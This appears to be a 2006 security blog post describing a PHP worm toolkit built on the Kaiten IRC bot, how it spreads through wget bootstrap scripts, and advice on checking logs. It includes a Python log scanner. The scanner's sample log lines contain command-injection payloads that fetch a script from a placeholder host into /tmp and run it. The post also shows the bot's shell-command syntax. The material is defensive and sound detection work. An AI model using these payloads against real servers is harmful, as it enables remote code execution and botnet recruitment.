Recent PHP Worm Activity
For the past several months we've been seeing a lot of PHP-based attacks related to a semi-worm toolkit. It consists of a Kaiten-based bot that makes the IRC connections, sometimes a Perl connect-back shell, and finally an exploit toolkit. The targets are PHP-based apps, attacked through either command injection or XML-RPC. Looking through my logs I see these IPs making the attacks for the month of February, 2006.
Keep an eye on your logs, look for PHP attacks that use "wget" to call out and fetch a bootstrap script, and make sure your machine is up to date. The botnets that have grown out of this are thousands of machines strong and can do some damage.
Update
Some technical notes. Kaiten is the name of a bot for which the source is available. It's written in C, is usually a single source file, and has hardcoded IRC servers and channels. It's basically an IRC client that logs in to a server and receives commands from its users. You can issue commands like "!PDMGV SH ls /" (where "PDMGV" is the bot's nick) to have an arbitrary shell command executed, and you have access to scanning, DDoS attacks, etc. Kaiten does not spread on its own: it can drive a scanner and an exploit tool, but it is not the whole of the "worm" kit here. (This harks back to the late 1990s, when Eggdrop bots would appear on compromised Linux boxes. Eggdrop is not a worm, but it does give access to a compromised box via IRC.) The propagation works like this:
- Find web servers to attack, whether by search engine queries or by scanning.
- Launch the attack and make the victim run "wget" to fetch a script from a server, copy it to /tmp, execute it, and disconnect.
- The downloaded script, once launched, uses "wget" to fetch two more executables. When run, they connect to the IRC server and can be used to launch further attacks.
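As an added example (not code from the original post), here is a Python log scanner for the "wget a bootstrap script into /tmp" pattern described in the steps above and in the advice to watch your logs. The log lines, source addresses and hostnames are constructed, and the indicator regexes are this example's own, not signatures from any product.

```python
"""Scan combined-format web access logs for the pattern the post warns about:
a PHP request whose target carries a shell fragment that fetches a bootstrap
script with wget, drops it in /tmp and runs it. Sample log lines are constructed."""
import re
from collections import Counter
from urllib.parse import unquote

# combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Indicators are checked in the decoded request target only; the User-Agent is
# deliberately ignored, since a legitimate "Wget/1.x" client string is common.
INDICATORS = {
    "fetch": re.compile(r'\b(?:wget|curl)\b'),
    "tmp":   re.compile(r'/(?:tmp|var/tmp|dev/shm)\b'),
    "exec":  re.compile(r'(?:;|&&|\|\|)\s*(?:perl|sh|bash|chmod)\b'),
}

def decode(target: str) -> str:
    """Payloads are URL-encoded once, sometimes twice; decode both layers."""
    return unquote(unquote(target))

def classify(line: str):
    """Return a finding dict for a suspicious line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode(m.group("target"))
    hits = [name for name, rx in INDICATORS.items() if rx.search(target)]
    # A bare "wget" in a path is not enough; require a corroborating indicator.
    if "fetch" in hits and len(hits) >= 2:
        return {"ip": m.group("ip"), "target": target, "indicators": hits}
    return None

def scan(lines):
    """Return (findings, attack count per source IP) for an iterable of log lines."""
    findings = [f for f in map(classify, lines) if f]
    return findings, Counter(f["ip"] for f in findings)

SAMPLE_LOG = [  # constructed: RFC 5737 addresses and a reserved .invalid host
    '203.0.113.9 - - [21/Feb/2006:03:14:07 +0000] "GET /index.php?cmd=cd%20/tmp;'
    'wget%20http://example.invalid/boot.txt;perl%20boot.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.77 - - [21/Feb/2006:03:20:41 +0000] "GET /app.php?id=1;cd%2520/tmp%253B'
    'wget%2520http://example.invalid/b.txt%253Bsh%2520b.txt HTTP/1.0" 500 0 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [21/Feb/2006:04:00:01 +0000] "GET /about.html HTTP/1.0" 200 2048 "-" "Wget/1.10"',
    '198.51.100.5 - - [21/Feb/2006:04:05:13 +0000] "GET /docs/wget-manual.html HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]
```

The second sample line is double URL-encoded, which is why `decode` unquotes twice; the last two lines show that a Wget client string or "wget" in a documentation path alone does not trigger a finding.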
If you'd like to read more about these threats, have a look at the following links:
- UNIX_MARE.D from Trend Micro
- Linux.Plupii.C from Symantec.
- ELF_MARE.C from Trend Micro
- Perl_MARE.C from Trend Micro
- Perl_Shellbot.AI from Secunia (pointing to two AV write-ups)
February 21, 2006 in new trends | Permalink
Comments
"Kaiten is the name of a bot to which the source is available"
Could you point me to a link for it?
Posted by: Roy | Feb 22, 2006 4:14:21 AM
Nope, not gonna share it; you'll have to Google around for it. It's in all the obvious places...
Posted by: jose | Feb 22, 2006 10:38:02 AM